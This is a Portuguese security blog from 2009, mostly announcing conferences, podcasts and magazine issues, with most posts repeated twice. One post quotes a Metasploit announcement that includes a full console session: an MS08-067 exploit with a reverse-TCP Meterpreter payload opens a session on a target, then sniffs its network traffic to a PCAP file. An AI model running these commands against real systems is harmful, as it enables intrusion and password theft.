A chamada de artigos para a conferencia yStS (you Sh0t the Sheriff) está aberta!
A quarta edição irá acontecer novamente em São Paulo, Brasil, no dia
17 de Maio de 2010.
INTRODUCAO
O you sh0t the Sheriff é um evento único, dedicado a mostrar os temas
mais interessantes e atuais relacionados à segurança da informação,
trazendo uma combinação de palestras de alta qualidade com
palestrantes renomados de diversas partes do planeta e cobrindo
diversos tópicos sobre o tema.
Nosso objetivo principal é permitir que os participantes tenham uma
visão do estado atual da segurança no mundo, combinando diferentes
segmentos da área.
O evento é basicamente para convidados, assim sendo, submeter uma
apresentação é certamente uma boa maneira de tentar participar,
principalmente se você reside no Brasil
Em função do sucesso das edições passadas, nós mantivemos o evento no
mesmo formato:
- Ambiente descontraído
- O YSTS 4 vai acontecer em um local secreto (anunciado somente aos
participantes algumas semanas antes do dia da conferencia)
- Novamente o este local secreto será em um aprazível bar ou pub
- E sim, teremos (alguma) comida e (bastante) bebida
TÓPICOS
O foco do YSTS 4 são assuntos relacionados com segurança da
informação, incluindo (mas não limitado a):
* Sistemas operacionais
* Tópicos sobre Gestão e Carreira
* Dispositivos móveis/sistemas embarcados
* Auditoria e controle
* Redes sociais
* Políticas de segurança
* Problemas com protocolos
* Redes/Telecomunicações
* Redes sem fio e Radiofreqüência em geral
* Resposta a incidentes
* Information Warfare
* Guerra de informação
* Código malicioso / BotNets
* Falhas dirigidas a usuários
* Programação segura
* Hacker Spaces / Comunidades hacker
* Fuzzing
* Segurança física
* Virtualização
* Segurança em aplicações WEB
* Computação nas nuvens
* Criptografia / Ofuscação
* Infra-estrutura e sistemas críticos
* Bafômetro hacks
* E qualquer outra coisa relacionada com segurança que você imagine
que seja interessante ser apresentada na conferência
Nós gostamos de palestras curtas, então, por favor, lembre-se que sua
palestra deve caber em no máximo 30 minutos.
Como novidade, este ano nós também aceitaremos palestras de 15 minutos.
Algumas pessoas não precisam de 30 minutos para passa sua mensagem ou
gostariam de falar sobre um projeto recém iniciado. Para estes casos
15 minutos será suficiente.
You sh0t the Sheriff é certamente a conferencia perfeita para lançar
seus projetos novos, confie em nós
E sim, nós preferimos coisas novas e novos palestrantes são mais que
bem-vindos. Se você tem uma algo bacana para falar, isso é o que
importa.
PRIVILÉGIOS PARA OS PALESTRANTES
(Somente para palestras de 30 minutos)
* R$ 700 para auxilio nas despesas de deslocamento para palestrastes
que residam fora da cidade de São Paulo;
* Café da manha, almoço e jantar durante a conferencia;
* Festa oficial pós-conferencia (e não oficiais também);
* Auditoria de produtos em churrascarias tradicionais;
* Entrada vitalícia para todas as futuras edições da conferencia (Sim,
se você já falou em alguma edição passada do yStS você tem entrada
grátis garantida, pode nos pagar uma cerveja por isso... hmm esqueça,
as bebidas no evento são grátis).
SUBMISSÃO
Cada submissão de palestra deve incluir as seguintes informações:
* Nome, titulo, endereço, email e telefone para contato
* Biografia resumida e qualificações
* Experiência em apresentações
* Sumario ou abstrato da apresentação
* Esta e uma palestra de 15 ou 30 minutos?
* Recursos necessários (Alem do projetor)
* Outras publicações ou conferencias onde este material foi ou será
publicado/submetido
Nos aceitamos submissões em Ingles, Português ou Espanhol
DATAS IMPORTANTES
Data Final para submissão - 28 de Fevereiro 2010 (23:59 - Horário de Brasília)
Notificação das palestras aceitas - 20 de Março 2010
Data Final para envio do material aceito: 5 de Maio 2010
Por favor, envie sua submissão para cfp/at/ysts.org
CONTATOS
Submissão de artigos: cfp/at/ysts.org
Perguntas em gerais: b0ard/at/ysts.org
Questões sobre patrocínio: sponsors/at/ysts.org
COISAS RELACIONADAS
Arquivos de palestras anteriores, incluindo os vídeos, at www.ysts.org
Esperamos vê-lo(a) lá!
OBS: Para quem não conhece, veja como foi a edição 3:
http://www.vimeo.com/6887470
Luiz Eduardo & Nelson Murilo & Willian Caprino
http://ysts.org
quinta-feira, 3 de dezembro de 2009
sábado, 3 de outubro de 2009
Podcast Nacional - [i shot the sheriff] Edição 69 - 26.09.09
Duração: 1 hora e 5 minutos
Eventos
CFP da H2HC aberto até o dia 5 de outubro
BH DC CFP Open
Nullcon
ShmooCon 2010 CFP is Open
All these pcaps (7GB and 25 million packets) along with the ITOC and Defcon11 datasets are now available at pcapr.net
Noticias
América encabeza lista de envíos de spam
802.11n Wi-Fi standard finally approved
Brasil terá padrão único para RFID
Foiled by Facebook: Would-Be Burglar Jonathan Parker
iPhone Straining AT&T Network
Apple's Sloppy Security Moves
Incidentes do Google (ex. Gmail em 24/09)
Escute em : http://www.naopod.com.br
Happy Hacking!
Rodrigo Montoro(Sp0oKeR)
Eventos
CFP da H2HC aberto até o dia 5 de outubro
BH DC CFP Open
Nullcon
ShmooCon 2010 CFP is Open
All these pcaps (7GB and 25 million packets) along with the ITOC and Defcon11 datasets are now available at pcapr.net
Noticias
América encabeza lista de envíos de spam
802.11n Wi-Fi standard finally approved
Brasil terá padrão único para RFID
Foiled by Facebook: Would-Be Burglar Jonathan Parker
iPhone Straining AT&T Network
Apple's Sloppy Security Moves
Incidentes do Google (ex. Gmail em 24/09)
Escute em : http://www.naopod.com.br
Happy Hacking!
Rodrigo Montoro(Sp0oKeR)
segunda-feira, 28 de setembro de 2009
AppSec Brasil 2009 - Chamada para participação
Caros,
Amanhã (29/09/2009) começa as inscricões para o AppSec Brasil 2009 .
AppSec Brasil 2009
CHAMADA PARA PARTICIPAÇÃO
Conferência internacional de Segurança de Aplicações, organizada e promovida pela comunidade TI-controle e pelo Centro de Informática da Câmara dos Deputados, em parceria com o OWASP, Capítulo brasil, e com apoio da Universidade de Brasília (UnB).
O Centro de Informática da Câmara dos Deputados e a Comunidade TI-Controle convidam a todos a participarem da Conferência Internacional de Segurança de Aplicações (AppSec Brasil 2009), que ocorrerá na Câmara dos Deputados (Brasília, DF) de 27 a 30 de outubro de 2009.
Haverão mini-cursos nos dias 27 e 28 de outubro, seguidos de sessões plenárias de trilha única nos dias 29 e 30 de outubro de 2009.
Keynotes
Dr. Gary McGraw, CTO da Cigital
O Modelo de Maturidade Building Security In (BSIMM)
Jason Li, Aspect Security
Ágil e Seguro: É possível fazer os dois?
Dinis Cruz, OWASP Board
Apresentação do Projeto OWASP
Kuai Hinojosa, NY University e OWASP
Implementando Aplicações Web Seguras Usando Recursos do OWASP
Palestras
A Conferência contará com palestras técnicas que tratarão diversos aspectos de Segurança de Aplicações. Os temas incluem:
* Segurança de aplicações web
* Otimização de gastos com segurança
* SQL Ownage
* ferramentas.
Mini-cursos
A Conferência contará também com 5 mini-cursos:
* Gestão de Riscos de Segurança Aplicada a Web Services
* Segurança Web: Técnicas para Programação Segura de Aplicações
* Segurança Computacional no Desenvolvimento de Web Services
* Tecnologias de Segurança em Web Services
* Hands on Web Application Testing using the OWASP Testing Guide.
Local
A Conferência ocorrerá na Câmara dos Deputados, em Brasília. As plenárias serão no auditório Nereu Ramos, no Anexo II e os mini-cursos serão no Centro de Formação, Treinamento e Aperfeiçoamento.
Inscrições
A participação na Conferência será gratuita, mas, devido à limitação de lugares, será necessário inscrever-se previamente.
As inscrições estarão abertas a partir do dia 29/09/2009 na URL: http://www.camara.gov.br/appsecbrasil2009
Informações
Para maiores informações, favor consultar os sites abaixo ou enviar email para appsec.brasil@camara.gov.br
Inscrições e informações sobre a conferência: http://www.camara.gov.br/appsecbrasil2009
Comunidade TI-Controle: http://www.ticontrole.gov.br
Câmara dos Deputados: http://www.camara.gov.br
--
If a tree falls in the forest and no one is around to see it, do the other trees make fun of it?
_______________________________________________
Owasp-brazilian mailing list
Owasp-brazilian@lists.owasp.org
https://lists.owasp.org/mailman/listinfo/owasp-brazilian
Nos vemos por lá pessoal =)!
Happy Hacking!
Rodrigo Montoro(Sp0oKeR)
Amanhã (29/09/2009) começa as inscricões para o AppSec Brasil 2009 .
AppSec Brasil 2009
CHAMADA PARA PARTICIPAÇÃO
Conferência internacional de Segurança de Aplicações, organizada e promovida pela comunidade TI-controle e pelo Centro de Informática da Câmara dos Deputados, em parceria com o OWASP, Capítulo brasil, e com apoio da Universidade de Brasília (UnB).
O Centro de Informática da Câmara dos Deputados e a Comunidade TI-Controle convidam a todos a participarem da Conferência Internacional de Segurança de Aplicações (AppSec Brasil 2009), que ocorrerá na Câmara dos Deputados (Brasília, DF) de 27 a 30 de outubro de 2009.
Haverão mini-cursos nos dias 27 e 28 de outubro, seguidos de sessões plenárias de trilha única nos dias 29 e 30 de outubro de 2009.
Keynotes
Dr. Gary McGraw, CTO da Cigital
O Modelo de Maturidade Building Security In (BSIMM)
Jason Li, Aspect Security
Ágil e Seguro: É possível fazer os dois?
Dinis Cruz, OWASP Board
Apresentação do Projeto OWASP
Kuai Hinojosa, NY University e OWASP
Implementando Aplicações Web Seguras Usando Recursos do OWASP
Palestras
A Conferência contará com palestras técnicas que tratarão diversos aspectos de Segurança de Aplicações. Os temas incluem:
* Segurança de aplicações web
* Otimização de gastos com segurança
* SQL Ownage
* ferramentas.
Mini-cursos
A Conferência contará também com 5 mini-cursos:
* Gestão de Riscos de Segurança Aplicada a Web Services
* Segurança Web: Técnicas para Programação Segura de Aplicações
* Segurança Computacional no Desenvolvimento de Web Services
* Tecnologias de Segurança em Web Services
* Hands on Web Application Testing using the OWASP Testing Guide.
Local
A Conferência ocorrerá na Câmara dos Deputados, em Brasília. As plenárias serão no auditório Nereu Ramos, no Anexo II e os mini-cursos serão no Centro de Formação, Treinamento e Aperfeiçoamento.
Inscrições
A participação na Conferência será gratuita, mas, devido à limitação de lugares, será necessário inscrever-se previamente.
As inscrições estarão abertas a partir do dia 29/09/2009 na URL: http://www.camara.gov.br/appsecbrasil2009
Informações
Para maiores informações, favor consultar os sites abaixo ou enviar email para appsec.brasil@camara.gov.br
Inscrições e informações sobre a conferência: http://www.camara.gov.br/appsecbrasil2009
Comunidade TI-Controle: http://www.ticontrole.gov.br
Câmara dos Deputados: http://www.camara.gov.br
--
If a tree falls in the forest and no one is around to see it, do the other trees make fun of it?
_______________________________________________
Owasp-brazilian mailing list
Owasp-brazilian@lists.owasp.org
https://lists.owasp.org/mailman/listinfo/owasp-brazilian
Nos vemos por lá pessoal =)!
Happy Hacking!
Rodrigo Montoro(Sp0oKeR)
domingo, 13 de setembro de 2009
Nova lista discussão Snort-BR
Migramos a lista =)
Tivemos e estamos com problemas na velha lista do snort-br que fica hospedada no mailling do CIPSGA. Visando a melhoria do grupo e para não termos mais problemas estamos migrando a lista para o grupos do google. Não enviamos convites para todos os ex-membros da outra lista visto que nem todos acreditamos queiram continuar na mesma.
Por favor entrem na nova lista e repassem para os conhecidos que utilizam Snort .
Visite o nosso site e se cadastre :
http://groups.google.com.br/group/snort-brasil?hl=pt-BR
Para se inscrever :
http://groups.google.com.br/group/snort-brasil/subscribe
Obrigado a todos!
Fonte: http://snort.org.br/index.php?option=com_content&task=view&id=88&Itemid=43
Happy Snorting
Rodrigo Montoro(Sp0oKeR)
Tivemos e estamos com problemas na velha lista do snort-br que fica hospedada no mailling do CIPSGA. Visando a melhoria do grupo e para não termos mais problemas estamos migrando a lista para o grupos do google. Não enviamos convites para todos os ex-membros da outra lista visto que nem todos acreditamos queiram continuar na mesma.
Por favor entrem na nova lista e repassem para os conhecidos que utilizam Snort .
Visite o nosso site e se cadastre :
http://groups.google.com.br/group/snort-brasil?hl=pt-BR
Para se inscrever :
http://groups.google.com.br/group/snort-brasil/subscribe
Obrigado a todos!
Fonte: http://snort.org.br/index.php?option=com_content&task=view&id=88&Itemid=43
Happy Snorting
Rodrigo Montoro(Sp0oKeR)
terça-feira, 1 de setembro de 2009
(IN)SECURE Magazine 22 disponível
Mas uma (IN)SECURE magazine disponivel para download. Excelente revista eletronica com otimo conteudo e free =)!
Nesse release
* Using real-time events to drive your network scans
* The Nmap project: Open source with style
* A look at geolocation, URL shortening and top Twitter threats
* Review: Data Locker
* Making clouds secure
* Top 5 myths about wireless protection
* Securing the foundation of IT systems
* Is your data recovery provider a data security problem?
* Security for multi-enterprise applications
* In mashups we trust?
* AND MORE!
Para baixá-la: http://www.net-security.org/dl/insecure/INSECURE-Mag-22.pdf
Happy Hacking!
Rodrigo Montoro(Sp0oKeR)
Nesse release
* Using real-time events to drive your network scans
* The Nmap project: Open source with style
* A look at geolocation, URL shortening and top Twitter threats
* Review: Data Locker
* Making clouds secure
* Top 5 myths about wireless protection
* Securing the foundation of IT systems
* Is your data recovery provider a data security problem?
* Security for multi-enterprise applications
* In mashups we trust?
* AND MORE!
Para baixá-la: http://www.net-security.org/dl/insecure/INSECURE-Mag-22.pdf
Happy Hacking!
Rodrigo Montoro(Sp0oKeR)
segunda-feira, 31 de agosto de 2009
Grade AppSec Brasil 2009 Disponível
Caros,
Algum tempo sem post mas venho atraves desse divulgar a grade do AppSec Brasil que acontecerá em Brasilia.
O Modelo de Maturidade Building Security In (BSIMM) - Gary McGraw, Cigital
Ágil e Seguro: É possível fazer os dois? - Jason Li and Jerry Hoff, Aspect Security
Implementando Aplicações Web Seguras Usando Recursos do OWASP - Kuai Hinojosa, OWASP
Apresentação do projeto OWASP - Dinis Cruz, OWASP
Projetos da OWASP que podem ser utilizados livremente nas organizações - Dinis Cruz
As Camadas Lógica e Semântica da Segurança de Aplicações Web - Thomas Schreiber
O Uso de Web Application Firewalls (WAF) e Sistemas de Database Activity Monitoring (DAM) Para Melhorar a Segurança de Código - Brian Contos
ROI: Otimize os Gastos com Segurança - Matt Tesauro
O Modelo de Maturidade “Software Assurance Maturity Model (SAMM)” - Pravir Chandra
Técnicas Automáticas para “SQL Ownage” - Sebastian Cufre
Praticas e ferramentas fundamentais para o desenvolvimento de software seguro - Cássio Goldschmidt
Abordagem Preventiva para Teste de Segurança em Aplicações Web - Luiz Otávio Duarte, Ferrucio de Franco Rosa e Walcir M. Cardoso Jr.
ModSecurity, Firewall de Aplicação Web Open Source - Klaubert Herr da Silveira
Programação Segura utilizando Análise Estática - Philippe Sevestre
Grade com resumo das palestras: http://www.owasp.org/index.php/AppSec_Brasil_2009_(pt-br)#tab=Resumos_das_Palestras
Eu estarei certamente por lá. Alguém vai ? =)
Happy Hacking!
Rodrigo Montoro(Sp0oKeR)
Algum tempo sem post mas venho atraves desse divulgar a grade do AppSec Brasil que acontecerá em Brasilia.
O Modelo de Maturidade Building Security In (BSIMM) - Gary McGraw, Cigital
Ágil e Seguro: É possível fazer os dois? - Jason Li and Jerry Hoff, Aspect Security
Implementando Aplicações Web Seguras Usando Recursos do OWASP - Kuai Hinojosa, OWASP
Apresentação do projeto OWASP - Dinis Cruz, OWASP
Projetos da OWASP que podem ser utilizados livremente nas organizações - Dinis Cruz
As Camadas Lógica e Semântica da Segurança de Aplicações Web - Thomas Schreiber
O Uso de Web Application Firewalls (WAF) e Sistemas de Database Activity Monitoring (DAM) Para Melhorar a Segurança de Código - Brian Contos
ROI: Otimize os Gastos com Segurança - Matt Tesauro
O Modelo de Maturidade “Software Assurance Maturity Model (SAMM)” - Pravir Chandra
Técnicas Automáticas para “SQL Ownage” - Sebastian Cufre
Praticas e ferramentas fundamentais para o desenvolvimento de software seguro - Cássio Goldschmidt
Abordagem Preventiva para Teste de Segurança em Aplicações Web - Luiz Otávio Duarte, Ferrucio de Franco Rosa e Walcir M. Cardoso Jr.
ModSecurity, Firewall de Aplicação Web Open Source - Klaubert Herr da Silveira
Programação Segura utilizando Análise Estática - Philippe Sevestre
Grade com resumo das palestras: http://www.owasp.org/index.php/AppSec_Brasil_2009_(pt-br)#tab=Resumos_das_Palestras
Eu estarei certamente por lá. Alguém vai ? =)
Happy Hacking!
Rodrigo Montoro(Sp0oKeR)
segunda-feira, 13 de julho de 2009
Metasploit - Meterpreter Sniffer module
Adicionaram uma função fantastica para o meterpreter do metasploit =)! Com certeza isso da um potencial imenso para roubo de senhas plain-text e valoriza ainda mais o uso de criptografia em todos os protocolos https, imaps, pop3s, ssh e demais necessidade .
I committed a test version of the sniffer extension to the SVN trunk. The module in SVN is compiled with debug support, so you should see lots of verbose debug prints if you attach a debugger to the process where meterpreter is running. I could use some help testing this new extension; so far it looks like there are some cases where the "use sniffer" command fails (exploiting ms03-026 on win2003 sp0), but there may be others as well.
To obtain the latest version of Metasploit on UNIX platforms:
$ svn co https://metasploit.com/svn/framework3/trunk/
To obtain the latest version of Metasploit on Windows:
1. Download https://metasploit.com/framework-3.3-dev.exe
2. Execute this and extract the framework to a directory
3. Inside the extracted directory execute msfupdate.bat
4. Inside the extracted directory execute msfconsole.bat
This module uses the MicroOLAP (commercial) Packet Sniffer SDK (we have a license), it can sniff packets from the target system without writing to the filesystem or installing any drivers. The module automatically excludes its own control traffic from the packet capture. As of this week, all Meterpeter communication is now protected by TLS/SSL, including the packet sniffer data.
To get started with the new module:
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpeter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.139
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.120
msf exploit(ms08_067_netapi) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (205824 bytes)
[*] Meterpreter session 1 opened (192.168.0.139:4444 -> 192.168.0.120:1687)
meterpreter > use sniffer
Loading extension sniffer...success.
meterpreter > help
[snip]
Sniffer Commands
================
Command Description
------- -----------
sniffer_dump Retrieve captured packet data
sniffer_interfaces List all remote sniffable interfaces
sniffer_start Capture packets on a previously opened interface
sniffer_stats View statistics of an active capture
sniffer_stop Stop packet captures on the specified interface
meterpreter > sniffer_interfaces
1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )
meterpreter > sniffer_start 1
[*] Capture started on interface 1 (200000 packet buffer)
meterpreter > sniffer_dump 1 /tmp/all.cap
[*] Dumping packets from interface 1...
[*] Wrote 6 packets to PCAP file /tmp/all.cap
meterpreter > sniffer_dump 1 /tmp/all.cap
[*] Dumping packets from interface 1...
[*] Wrote 31 packets to PCAP file /tmp/all.cap
The sniffer_dump command will append to an existing PCAP or create a new one.
-HD
Cuidado com suas senhas trafegas em plain-text =)!
Happy Hacking!
Rodrigo Montoro(Sp0oKeR)
I committed a test version of the sniffer extension to the SVN trunk. The module in SVN is compiled with debug support, so you should see lots of verbose debug prints if you attach a debugger to the process where meterpreter is running. I could use some help testing this new extension; so far it looks like there are some cases where the "use sniffer" command fails (exploiting ms03-026 on win2003 sp0), but there may be others as well.
To obtain the latest version of Metasploit on UNIX platforms:
$ svn co https://metasploit.com/svn/framework3/trunk/
To obtain the latest version of Metasploit on Windows:
1. Download https://metasploit.com/framework-3.3-dev.exe
2. Execute this and extract the framework to a directory
3. Inside the extracted directory execute msfupdate.bat
4. Inside the extracted directory execute msfconsole.bat
This module uses the MicroOLAP (commercial) Packet Sniffer SDK (we have a license), it can sniff packets from the target system without writing to the filesystem or installing any drivers. The module automatically excludes its own control traffic from the packet capture. As of this week, all Meterpeter communication is now protected by TLS/SSL, including the packet sniffer data.
To get started with the new module:
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpeter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.139
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.120
msf exploit(ms08_067_netapi) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (205824 bytes)
[*] Meterpreter session 1 opened (192.168.0.139:4444 -> 192.168.0.120:1687)
meterpreter > use sniffer
Loading extension sniffer...success.
meterpreter > help
[snip]
Sniffer Commands
================
Command Description
------- -----------
sniffer_dump Retrieve captured packet data
sniffer_interfaces List all remote sniffable interfaces
sniffer_start Capture packets on a previously opened interface
sniffer_stats View statistics of an active capture
sniffer_stop Stop packet captures on the specified interface
meterpreter > sniffer_interfaces
1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )
meterpreter > sniffer_start 1
[*] Capture started on interface 1 (200000 packet buffer)
meterpreter > sniffer_dump 1 /tmp/all.cap
[*] Dumping packets from interface 1...
[*] Wrote 6 packets to PCAP file /tmp/all.cap
meterpreter > sniffer_dump 1 /tmp/all.cap
[*] Dumping packets from interface 1...
[*] Wrote 31 packets to PCAP file /tmp/all.cap
The sniffer_dump command will append to an existing PCAP or create a new one.
-HD
Cuidado com suas senhas trafegas em plain-text =)!
Happy Hacking!
Rodrigo Montoro(Sp0oKeR)
terça-feira, 7 de julho de 2009
OWASP AppSec Brasil 2009 – CFP Deadline
Pessoal,
Estou retornando a ativa no blog, tive alguns eventos do qual preciso postar, também correria na N-Stalker/Dynsec bem como alguns researches por vir.
Nesse post venho falar da ultima semana do CFP do AppSec Brasil que será realizado em Brasilia.
Estamos na última semana para submissão de propostas de palestras para o AppSec Brasil 2009. Mais informações na página do evento: http://www.owasp.org/index.php/AppSec_Brasil_2009_(pt-br)
Ajudem-nos a espalhar o CFP e a solicitar o envio de propostas interessantes para o evento.
Enviei suas propostas, a viagem e estadia será totalmente custeada pela organização, alem de divulgar seu conhecimento, fara networking bem como palestras sempre abrem portas.
Happy Hacking!
Rodrigo Montoro(Sp0oKeR)
Estou retornando a ativa no blog, tive alguns eventos do qual preciso postar, também correria na N-Stalker/Dynsec bem como alguns researches por vir.
Nesse post venho falar da ultima semana do CFP do AppSec Brasil que será realizado em Brasilia.
Estamos na última semana para submissão de propostas de palestras para o AppSec Brasil 2009. Mais informações na página do evento: http://www.owasp.org/index.php/AppSec_Brasil_2009_(pt-br)
Ajudem-nos a espalhar o CFP e a solicitar o envio de propostas interessantes para o evento.
Enviei suas propostas, a viagem e estadia será totalmente custeada pela organização, alem de divulgar seu conhecimento, fara networking bem como palestras sempre abrem portas.
Happy Hacking!
Rodrigo Montoro(Sp0oKeR)
sexta-feira, 5 de junho de 2009
Podcast Segurança Nacional - [i shot the sheriff] Edição 66 - 04.06.09
1 hora e pouquinho de duracao
Eventos
ACSAC 2009 submissions due June 8 and June 10 (extended)
FRHACK 2009 Final Call For Papers extended
BugCON '09 has swine influenza!!
YSTS updates
Noticias
China installs a secure operating system on all military PCs
Google Experiments with Image Orientation CAPTCHA
Los 10 que no quieren estar en Google
5 IT security pet peeves
Para ouvir este e os 65 anteriores visite : http://www.naopod.com.br
YSTS v3.0 - http://www.ysts.org
Happy Hacking e nos vemos no YSTS .
Rodrigo Montoro(Sp0oKeR)
Eventos
ACSAC 2009 submissions due June 8 and June 10 (extended)
FRHACK 2009 Final Call For Papers extended
BugCON '09 has swine influenza!!
YSTS updates
Noticias
China installs a secure operating system on all military PCs
Google Experiments with Image Orientation CAPTCHA
Los 10 que no quieren estar en Google
5 IT security pet peeves
Para ouvir este e os 65 anteriores visite : http://www.naopod.com.br
YSTS v3.0 - http://www.ysts.org
Happy Hacking e nos vemos no YSTS .
Rodrigo Montoro(Sp0oKeR)
quinta-feira, 4 de junho de 2009
[Evento] GTER/GTS em São Paulo
Caros,
Quem não conhece o registro.br organiza o GTER e GTS com boas palestras e de forma gratuita. Esse ano teremos as seguintes palestras:
GTER
08:00 - 08:50 Recepção
08:50 - 09:00 Abertura
09:00 - 10:00 VoIP Completo
Julião Braga, TeleSA
10:00 - 10:30 Controlando tráfego de trânsito em um AS
Ana Lúcia de Faria, Cisco
10:30 - 11:00 Coffee Break
11:00 - 11:40 Rastreando fluxos para detecção de eventos em redes
Jorge Luiz Correa e André Proto. UNESP
11:40 - 12:30 Duplo acesso de "pobre" (Poor man's dual homing)
Danton Nunes, InterNexo
12:30 - 14:00 Almoço
14:00 - 15:00 Carrier Grade NAT
Igor Giangrossi, Cisco
15:00 - 17:50 Análise de Vulnerabilidades de Redes em Conexões com PTT
Eduardo Ascenço Reis, NIC.br
15:50 - 16:20 Coffee Break
16:10 - 17:20 Entendendo ASNs BGP de 4 bytes
André Gustavo Albuquerque, Cisco
17:20 - 18:10 DNSSHIM - DNSSEC automatizado
Cesar Henrique Keiti Kuroiwa, David Robert Camargo Campos e Mauro Romano Trajber, NIC.br
GTS
08:00 - 08:50 Recepção
08:50 - 09:00 Abertura
09:00 - 09:40 Ataques contra o SMTP - Como as botnets enviam spam
Miguel Di Ciurcio Filho, Unicamp
09:40 - 10:20 Malware Patrol - Os desafios de coletar e monitorar
URLs que apontam para Malwares
Andre Correa, Malware Patrol
10:20 - 10:50 Coffee Break
10:50 - 11:30 O Crime Cibernético contra as Leis: o cenário da
América Latina
Anchises M. G. de Paula, VeriSign Brasil
11:30 - 12:20 Desafios na criação de um CSIRT distribuído
Karina M. Queiroz, TIVIT
12:20 - 14:00 Almoço
14:00 - 14:30 Honeynets: Automatizando a restauração de Honeypots de
alta interatividade
Luiz Otávio Duarte, Renato Yuzo Madokoro e Ricardo Makino,
CTI / MCT
14:30 - 15:10 O que interessa não é o Servidor Web
Luiz Eduardo Dos Santos, Imperva, Inc.
15:10 - 15:50 Processo de Gestão de Identidades com uso de biometria
por impressão digital
Jorilson Rodrigues, DPF / Ministério da Justiça
15:50 - 16:20 Coffee Break
16:20 - 17:00 GATI - Tratamento de Incidentes de Segurança no MJ e DPF
Ivo de Carvalho Peixinho e Jorilson da Silva Rodrigues,
Departamento de Polícia Federal
17:00 - 17:40 Um ano do Catálogo de Fraudes RNP - Números, tendências
e próximos passos
Ronaldo Castro de Vasconcellos, CAIS / RNP
17:40 - 17:50 Encerramento
Para se inscrever e mais informações: http://gter.nic.br/reunioes/gter-27
Estarei lá no GTS =)!
Happy Hacking!
Rodrigo Montoro(Sp0oKeR)
Quem não conhece o registro.br organiza o GTER e GTS com boas palestras e de forma gratuita. Esse ano teremos as seguintes palestras:
GTER
08:00 - 08:50 Recepção
08:50 - 09:00 Abertura
09:00 - 10:00 VoIP Completo
Julião Braga, TeleSA
10:00 - 10:30 Controlando tráfego de trânsito em um AS
Ana Lúcia de Faria, Cisco
10:30 - 11:00 Coffee Break
11:00 - 11:40 Rastreando fluxos para detecção de eventos em redes
Jorge Luiz Correa e André Proto. UNESP
11:40 - 12:30 Duplo acesso de "pobre" (Poor man's dual homing)
Danton Nunes, InterNexo
12:30 - 14:00 Almoço
14:00 - 15:00 Carrier Grade NAT
Igor Giangrossi, Cisco
15:00 - 17:50 Análise de Vulnerabilidades de Redes em Conexões com PTT
Eduardo Ascenço Reis, NIC.br
15:50 - 16:20 Coffee Break
16:10 - 17:20 Entendendo ASNs BGP de 4 bytes
André Gustavo Albuquerque, Cisco
17:20 - 18:10 DNSSHIM - DNSSEC automatizado
Cesar Henrique Keiti Kuroiwa, David Robert Camargo Campos e Mauro Romano Trajber, NIC.br
GTS
08:00 - 08:50 Recepção
08:50 - 09:00 Abertura
09:00 - 09:40 Ataques contra o SMTP - Como as botnets enviam spam
Miguel Di Ciurcio Filho, Unicamp
09:40 - 10:20 Malware Patrol - Os desafios de coletar e monitorar
URLs que apontam para Malwares
Andre Correa, Malware Patrol
10:20 - 10:50 Coffee Break
10:50 - 11:30 O Crime Cibernético contra as Leis: o cenário da
América Latina
Anchises M. G. de Paula, VeriSign Brasil
11:30 - 12:20 Desafios na criação de um CSIRT distribuído
Karina M. Queiroz, TIVIT
12:20 - 14:00 Almoço
14:00 - 14:30 Honeynets: Automatizando a restauração de Honeypots de
alta interatividade
Luiz Otávio Duarte, Renato Yuzo Madokoro e Ricardo Makino,
CTI / MCT
14:30 - 15:10 O que interessa não é o Servidor Web
Luiz Eduardo Dos Santos, Imperva, Inc.
15:10 - 15:50 Processo de Gestão de Identidades com uso de biometria
por impressão digital
Jorilson Rodrigues, DPF / Ministério da Justiça
15:50 - 16:20 Coffee Break
16:20 - 17:00 GATI - Tratamento de Incidentes de Segurança no MJ e DPF
Ivo de Carvalho Peixinho e Jorilson da Silva Rodrigues,
Departamento de Polícia Federal
17:00 - 17:40 Um ano do Catálogo de Fraudes RNP - Números, tendências
e próximos passos
Ronaldo Castro de Vasconcellos, CAIS / RNP
17:40 - 17:50 Encerramento
Para se inscrever e mais informações: http://gter.nic.br/reunioes/gter-27
Estarei lá no GTS =)!
Happy Hacking!
Rodrigo Montoro(Sp0oKeR)
segunda-feira, 1 de junho de 2009
(IN)Secure Magazine Issue 21 released!
A (In)Secure magazine sempre vem com otimos artigos e em formato eletronico free.
* Malicious PDF: Get owned without opening
* Review: IronKey Personal
* Windows 7 security features: Building on Vista
* Using Wireshark to capture and analyze wireless traffic
* "Unclonable" RFID - a technical overview
* Secure development principles
* Q&A: Ron Gula on Nessus and Tenable Network Security
* Establish your social media presence with security in mind
* A historical perspective on the cybersecurity dilemma
* A risk-based, cost effective approach to holistic security
* AND MORE!
Para baixar: http://www.net-security.org/insecuremag.php
Happy Hacking!
Rodrigo Montoro(Sp0oKeR)
* Malicious PDF: Get owned without opening
* Review: IronKey Personal
* Windows 7 security features: Building on Vista
* Using Wireshark to capture and analyze wireless traffic
* "Unclonable" RFID - a technical overview
* Secure development principles
* Q&A: Ron Gula on Nessus and Tenable Network Security
* Establish your social media presence with security in mind
* A historical perspective on the cybersecurity dilemma
* A risk-based, cost effective approach to holistic security
* AND MORE!
Para baixar: http://www.net-security.org/insecuremag.php
Happy Hacking!
Rodrigo Montoro(Sp0oKeR)
domingo, 24 de maio de 2009
YSTS 3 - Grade, Concurso e Treinamentos
Amigos,
Sou suspeito para falar pois apoio o You Shot The Sheriff, mas desde o primeiro ano vi a evolução do evento, e os dois primeiros foram animais, esse então a previsão é que detone. A grade foi lançada e ainda estão com uma promoção para concorrerem a um ingresso!!
1) CONCURSO CULTURAL:
Você já pediu um convite para o YSTS 3 com nossos patrocinadores e ninguem te atendeu ?
Você pensou em comprar com cartão mas o crédito está estourado ?
Você quer muito ir nessa conferência mas não sabe como ?
Seus problemas acabaram !
